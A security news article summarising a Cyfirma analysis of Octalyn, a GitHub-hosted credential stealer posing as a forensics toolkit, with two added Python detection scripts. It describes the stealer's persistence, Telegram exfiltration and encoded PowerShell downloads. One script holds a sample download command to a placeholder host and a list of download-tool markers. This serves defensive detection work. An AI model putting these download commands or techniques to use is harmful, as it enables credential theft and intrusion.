Researchers at Cyfirma have uncovered a disturbing example of how a so-called “educational” tool can cross the line into full-blown malware. Publicly hosted on GitHub, the Octalyn Forensic Toolkit is masquerading as a digital forensics utility but is, in reality, a modular credential stealer engineered for persistent data theft, silent execution, and Telegram-based command-and-control.
“Despite its claimed educational intent, the toolkit functions as a full-fledged credential stealer,” Cyfirma states, emphasizing that even low-skilled actors can wield it with ease.
Octalyn is made up of two key components:
- A Delphi-based builder with a friendly GUI for generating payloads
- A C++-written executable that acts as the actual stealer
To generate a malicious payload, an attacker simply enters a Telegram bot token and chat ID, enabling real-time data exfiltration via Telegram. From there, the malware:
- Silently extracts credentials from browsers, VPNs, Discord, Telegram, and gaming accounts
- Hunts for cryptocurrency wallets, capturing everything from private keys to wallet.dat files
- Establishes persistence using Startup folder shortcuts and registry Run keys
- Compresses stolen data and transmits it over encrypted channels to Telegram
Once deployed, Octalyn searches for common Chromium-based browser files and decrypts stored cookies, passwords, and autofill data. It even extracts bookmarks and browsing history to help attackers profile victims.
“All stolen credentials and system information are stored in an organized directory structure… Crypto wallets, VPN, Browsers, Discord, and others.”
In its pursuit of financial data, Octalyn scans for wallets related to Bitcoin, Ethereum, Litecoin, Monero, and popular browser-based extensions like MetaMask and TronLink.
Each category is saved in a tidy subfolder, allowing attackers to quickly sort through and exploit the exfiltrated content.
Octalyn goes to great lengths to avoid detection and ensure longevity on a system:
- Startup folder persistence: Installs rvn.exe in the user’s Startup path
- Registry persistence: Adds itself to the HKCU\Run registry key
- Silent operation: Uses ShellExecuteA with SW_HIDE to remain invisible to the user
- Secondary payload delivery: Employs Base64-encoded PowerShell to fetch additional malware from GitHub
“The malware then constructs and executes a Base64-encoded PowerShell script… written in UTF-16LE format,” Cyfirma notes, highlighting a rarely seen level of stealth and obfuscation.
At the time of analysis, the downloaded payload (winlogon.exe) wasn’t available, but the GitHub repository remained live, indicating future drops could be imminent.
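The persistence and evasion behaviours listed above are all visible in ordinary endpoint telemetry. The following script is an added example, not Cyfirma's tooling or anything from the Octalyn repository: it decodes a PowerShell `-EncodedCommand` blob (Base64 over UTF-16LE text, exactly the encoding the report describes) so an analyst can read what was launched, and flags writes to the user's Startup folder or the `HKCU\...\Run` key. The event schema, the process names, the placeholder URL and every sample value are constructed for illustration.

```python
"""Triage helpers for encoded-PowerShell launches and Startup/Run-key persistence.

Added example, not Cyfirma's code and not the malware's. The simplified
event format below (id, image, command_line, target) and all sample values
are constructed; real telemetry (Sysmon, EDR) carries more fields."""
import base64
import re

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -en, -enc).
# The trailing whitespace requirement keeps -ExecutionPolicy / -ep from matching.
ENCODED_FLAG = re.compile(r"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# Cmdlets and helpers that indicate a second-stage download inside the decoded script.
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                    "start-bitstransfer", "curl ", "wget ")
STARTUP_PATH = re.compile(r"(?i)\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\")
RUN_KEY = re.compile(r"(?i)HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an -EncodedCommand blob, else None.

    PowerShell expects Base64 of the UTF-16LE bytes of the script, so both
    layers are undone here; malformed Base64 or odd-length data yields None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event):
    """Return the list of finding tags raised by one constructed event."""
    findings = []
    decoded = decode_encoded_command(event.get("command_line", ""))
    if decoded is not None:
        findings.append("encoded-powershell")
        if any(marker in decoded.lower() for marker in DOWNLOAD_MARKERS):
            findings.append("encoded-powershell-downloader")
    target = event.get("target", "")
    if STARTUP_PATH.search(target):
        findings.append("startup-folder-persistence")
    if RUN_KEY.search(target):
        findings.append("hkcu-run-persistence")
    return findings


def triage(events):
    """Map event id -> findings for a batch of events."""
    return {e["id"]: triage_event(e) for e in events}


# Constructed sample script and events; the URL is a deliberate placeholder.
SAMPLE_SCRIPT = "Invoke-WebRequest https://example.invalid/placeholder -OutFile winlogon.exe"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "image": "powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -enc {SAMPLE_ENCODED}", "target": ""},
    {"id": 2, "image": "rvn.exe", "command_line": "rvn.exe",
     "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rvn.lnk"},
    {"id": 3, "image": "rvn.exe", "command_line": "rvn.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rvn"},
    {"id": 4, "image": "powershell.exe",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File backup.ps1", "target": ""},
]

if __name__ == "__main__":
    for event_id, findings in triage(SAMPLE_EVENTS).items():
        print(event_id, findings or "clean")
```

Decoding the blob rather than alerting on `-enc` alone matters in practice: encoded launches are common in legitimate management tooling, so the download markers inside the decoded text, combined with a Startup or Run-key write from the same host, are what separate this pattern from routine admin scripts.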
Perhaps Octalyn’s most cunning feature is its use of Telegram as a command-and-control (C2) mechanism. Because the exfiltration blends into legitimate TLS traffic to a widely used service, traffic analysis and detection are much more difficult than with traditional HTTP-based malware.
“The malware establishes a secure connection over TLS to the Telegram API… transmitting a uniquely identifiable ZIP file name to indicate successful infection.”
These ZIPs, named using the victim’s username, contain the stolen data in a structured format that attackers can immediately exploit.
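Telegram-based exfiltration still leaves a footprint: the Bot API host, the `/bot<id>:<token>/sendDocument` path where a proxy can see it, and an initiating process that has no business talking to it. The script below is an added example, not from the Cyfirma report, that runs that logic over constructed egress-proxy log lines. The log format, the approved-sender list, the process names and the bot tokens are all made up for illustration; the size threshold is an arbitrary starting point to tune.

```python
"""Flag Telegram Bot API use as a likely exfiltration channel in egress telemetry.

Added example, not Cyfirma's code. The log line layout, the approved sender
list and every sample value are constructed; adapt the regexes to your proxy."""
import re

BOT_API_HOST = "api.telegram.org"
# Bot API calls carry the bot id and token in the path, followed by the method.
BOT_PATH = re.compile(r"/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
# Processes your organisation has approved to send via the Bot API (constructed).
APPROVED_BOT_SENDERS = {"alerting-agent.exe"}
UPLOAD_METHODS = {"sendDocument", "sendPhoto"}
LARGE_UPLOAD_BYTES = 50_000  # tuning knob, not a vendor threshold

LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) proc=(?P<proc>\S+) method=(?P<method>\S+) "
    r"url=(?P<url>\S+) bytes_out=(?P<bytes_out>\d+)$"
)


def parse_line(line):
    """Parse one constructed proxy line into a dict, or None if it does not match."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def redact_token(url):
    """Keep the bot id (useful for correlation) but never copy a live token into a ticket."""
    return BOT_PATH.sub(lambda m: f"/bot{m.group(1)}:<redacted>/{m.group(3)}", url)


def classify(rec):
    """Return finding tags for a parsed record; empty list means nothing suspicious."""
    findings = []
    if rec["host"] != BOT_API_HOST:
        return findings
    if rec["proc"].lower() not in APPROVED_BOT_SENDERS:
        findings.append("bot-api-from-unapproved-process")
    m = BOT_PATH.search(rec["url"])
    if m:
        method = m.group(3)
        if method in UPLOAD_METHODS:
            findings.append("bot-api-file-upload")
        if method == "sendDocument" and int(rec["bytes_out"]) > LARGE_UPLOAD_BYTES:
            findings.append("large-upload")
    return findings


def triage_log(text):
    """Return {timestamp: (process, redacted url, findings)} for lines that raised a finding."""
    out = {}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec)
        if findings:
            out[rec["ts"]] = (rec["proc"], redact_token(rec["url"]), findings)
    return out


# Constructed sample: one stealer-like upload, one approved alerting bot, one browser session.
SAMPLE_LOG = """\
2025-07-01T10:00:01Z api.telegram.org proc=rvn.exe method=POST url=https://api.telegram.org/bot123456789:AAExampleTokenNotRealxxxxxxxxxxxxxxx/sendDocument bytes_out=184320
2025-07-01T10:00:05Z api.telegram.org proc=alerting-agent.exe method=POST url=https://api.telegram.org/bot987654321:AAAnotherPlaceholder/sendMessage bytes_out=412
2025-07-01T10:00:09Z web.telegram.org proc=chrome.exe method=GET url=https://web.telegram.org/ bytes_out=900
"""

if __name__ == "__main__":
    for ts, (proc, url, findings) in triage_log(SAMPLE_LOG).items():
        print(ts, proc, url, findings)
```

Without TLS inspection only the SNI or DNS name is visible, so the path-based checks fall away and the process-to-host pairing becomes the main signal; in that case the same `classify` logic applies with the `url` field empty, and the bot id remains available from the endpoint side if the process itself is captured.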
“Octalyn poses a serious threat if used outside controlled environments,” Cyfirma warns.